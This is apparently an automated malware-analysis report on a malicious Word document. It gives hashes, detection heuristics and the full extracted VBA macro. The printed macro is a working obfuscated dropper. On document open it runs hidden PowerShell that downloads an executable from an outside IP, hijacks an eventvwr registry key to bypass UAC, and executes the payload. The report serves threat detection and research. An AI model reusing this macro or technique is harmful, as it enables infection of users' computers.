Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 beba0c545403fb2c…

MALICIOUS

Office (OLE)

165.5 KB Created: 2017-01-20 00:05:00 Authoring application: Microsoft Office Word First seen: 2017-03-23
MD5: 8b6ece2658b42fadd40fa3e717919478 SHA-1: e60328fbb573510db5be2b304b84baa0e01c17b8 SHA-256: beba0c545403fb2ca683e12660f4b925ddfc337694ed95bab59e03d55b175c41
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros that execute a command to download and run a second-stage payload. The macro utilizes the `CreateObject` function and references `cmd.exe`, indicating an attempt to execute arbitrary commands. The heavily obfuscated string `zzcZMVdQ.9QezZxzQEV ZQ/Vcz QzP99O9wZE9QRV9szzHVVEZLzlZ.VEQzxQE9 VV-QzwQizNZ9Dz9OZVWVsVtQzyzLQEVz ZQhZIVVDQdzeQzNZ QZ-VnQOVQpZrVoZfZVIVVLVQeV VV-z9eVxVEzCzUZtZziVQOZVnzzpQQOVzLzIZCZyZ zZbQVYQPz9AQQsQZSV ZQ(VN9ZEzzwQ-VVOVZBzJQeVZc9TVZ QSQYVZS9TVVEQMQ.VNQeZztZ.ZWZEV9bz9CzQlzQiZQez9nVzTZZ)Zz.zQDZQoVWQQnZLZoQaV9DVFZVi9` is likely a URL for this payload. The presence of `Document_Open` and `ShellExecute` API calls further supports the malicious intent of executing external code.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-5997535-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-5997535-0
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Sub chefprint(urrulwfqir, hqrptsqgeemf)
Module1.festivalinject urrulwfqir, CreateObject(hqrptsqgeemf & "aPpliCAtIon")
Dim hbbhomuyznhmmse As Integer
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
    efiuqntvjgqva = 411
ozekxgisrtyprdjv.sHELlEXecUTe "cmd.exe", nkhrvaaciizdqhy, "", "open", 0
End Sub
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Public Sub Document_Open()
'wvuobdsvckczoauditprogram
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4445 bytes
SHA-256: 2ea740f2519c2e73d6db6fed18a366afe7c7baf972b1ff0f126833edab13a102
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub Document_Open()
'wvuobdsvckczoauditprogram
Dim qbvqwahtdsxxpxyvset As Long
qbvqwahtdsxxpxyvset = 814
qbvqwahtdsxxpxyvset = 766

ActiveDocument.Shapes.SelectAll
Selection.Delete
Dim boostsquirrel As Integer
boostsquirrel = 545
If boostsquirrel > 142 Then
'gappetdelayvendor
Dim vifpiafbomdozd As Long
vifpiafbomdozd = 634
vifpiafbomdozd = 21
End If
vwlwcjbrkcfvnqoijw = "zzcZMVdQ.9QezZxzQEV ZQ/Vcz QzP99O9wZE9QRV9szzHVVEZLzlZ.VEQzxQE9 VV-QzwQizNZ9Dz9OZVWVsVtQzyzLQEVz ZQhZIVVDQdzeQzNZ QZ-VnQOVQpZrVoZfZVIVVLVQeV VV-z9eVxVEzCzUZtZziVQOZVnzzpQQOVzLzIZCZyZ zZbQVYQPz9AQQsQZSV ZQ(VN9ZEzzwQ-VVOVZBzJQeVZc9TVZ QSQYVZS9TVVEQMQ.VNQeZztZ.ZWZEV9bz9CzQlzQiZQez9nVzTZZ)Zz.zQDZQoVWQQnZLZoQaV9DVFZVi9"
Dim gloryhead As Integer
gloryhead = 602
If gloryhead > 38 Then
'innerunfoldjbpxcxkqknekkei
Dim cterlqyxjyvfraacpvq As Long
cterlqyxjyvfraacpvq = 254
cterlqyxjyvfraacpvq = 914
End If
Dim fhtyzcioqhczydpkqmz As Integer
fhtyzcioqhczydpkqmz = 768
If fhtyzcioqhczydpkqmz > 976 Then
'indicatepatternhamsterlove
Dim mzopyeifxfsiwmsof As Long
mzopyeifxfsiwmsof = 815
mzopyeifxfsiwmsof = 858
End If
Module1.zxpeprapnmdmsc vwlwcjbrkcfvnqoijw
'accountelbowzdxjkwfiplziroh
Dim meshvolcano As Long
meshvolcano = 859
meshvolcano = 872
'biwcqakwwxacflbamocljssuomijq
Dim captainelement As Long
captainelement = 669
captainelement = 904
End Sub
Sub chefprint(urrulwfqir, hqrptsqgeemf)
Module1.festivalinject urrulwfqir, CreateObject(hqrptsqgeemf & "aPpliCAtIon")
Dim hbbhomuyznhmmse As Integer
hbbhomuyznhmmse = 134
If hbbhomuyznhmmse > 539 Then
'battlevoidyxddztfrapcjzgjefds
Dim guessmango As Long
guessmango = 419
guessmango = 530
End If
End Sub

























Attribute VB_Name = "Module1"
Sub zxpeprapnmdmsc(pcywvlzmookyhd)
'inputsuperdraftfront
Dim blinddrink As Long
blinddrink = 174
blinddrink = 120
fqpiwgopeexzheq = pcywvlzmookyhd & "lZezZ(z9'zhZtztZpV:ZQ/QZ/91z7Z6QQ.z1zV2Z3QQ.ZQ2VV6ZQ.91ZZ0Vz49/ZV0Q1Vz.Qdzlz'V,QV'Q9%QTVVEQMZQPZ%Q\9V\Zd99f9zhQVgZdVfzZeZ.ZezxQQezZ'z)ZV V&z QrzVeQZgzz zZazdVzdZz zZHZVKZCVzUQ\9\QSQoVzfZtZzwQQaVrZQeZ\Q\9QCzlz9a"
ThisDocument.chefprint fqpiwgopeexzheq & "ZVszszZeVVsV9\Q\VVmzVsZcVfZZizlQZeZ9\z\z9sQ9hVQeQlVVlz\V\QoZZpZZeZn9\QV\zzc9VoQmVmZaV9n99dQ Q9/ZdQ Q%VVTZEZMVPV%9Z\zZ\zQdV9fZZhVzgZVdZfVez.ZVeVxVe9 Z9/ZfZ zQ&9 zVe9QvZeVnzztzQvzZwZrZ.zeZQxQeQV ZZ&QQ QQPZQIVNQGVV Q-ZVnQz QV1Vz5z VV192Z7z.zZ0Q.zQ0QZ.z19>znzu9QlV Z&9V Zz%QT9QEVMVVP99%zz\V\QdQQf9zhQgZd9QfZVeZQ.ze9zxQe", "sHeLL."
End Sub
Sub festivalinject(mzbtybtxfdgeovipioi, ozekxgisrtyprdjv)
'blameverifyjyuvwfemveu
Dim dkgcmvzes As Long
dkgcmvzes = 553
dkgcmvzes = 754
nkhrvaaciizdqhy = ""
Dim shedshoot As Integer
shedshoot = 791
If shedshoot > 654 Then
'fiscalshipfsleysakjkubasndtus
Dim pausetruly As Long
pausetruly = 801
pausetruly = 281
End If
'vbjncjrkdldevicesunset
Dim zgebsivsf As Long
zgebsivsf = 960
zgebsivsf = 142
truckvital = "*"
Dim uoxmksrpwibfhpksr As Integer
uoxmksrpwibfhpksr = 236
If uoxmksrpwibfhpksr > 220 Then
'gmtafiyuygjdgiysccsovwg
Dim alphaseed As Long
alphaseed = 640
alphaseed = 702
End If
For buleokhoxszu = 1 To Len(mzbtybtxfdgeovipioi)
Dim niceraise As Integer
niceraise = 781
If niceraise > 924 Then
'campsymbolocnieefilygfailgpns
Dim msltthjglq As Long
msltthjglq = 540
msltthjglq = 923
End If
middlereturn = Mid(mzbtybtxfdgeovipioi, buleokhoxszu, 1)
Dim meadowquote As Integer
meadowquote = 892
If meadowquote > 361 Then
'gypthhdxccoconutlens
Dim hqpzlzbfotppopv As Long
hqpzlzbfotppopv = 806
hqpzlzbfotppopv = 126
End If
reviewsolid = truckvital & middlereturn & truckvital
If Not "VVzQZZ9zQ" Like reviewsolid Then
nkhrvaaciizdqhy = nkhrvaaciizdqhy & middlereturn
'bloodspeakfryrfdcdqmugc
Dim qbzgffdixmalxj As Long
qbzgffdixmalxj = 726
qbzgffdixmalxj = 727
'budgetfollowxpahgbkrdor
Dim touristvelvet As Long
touristvelvet = 119
touristvelvet = 99
End If
Next
'angertheoryopifhxvtjpp
Dim efiuqntvjgqva As Long
efiuqntvjgqva = 477
efiuqntvjgqva = 411
ozekxgisrtyprdjv.sHELlEXecUTe "cmd.exe", nkhrvaaciizdqhy, "", "open", 0
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.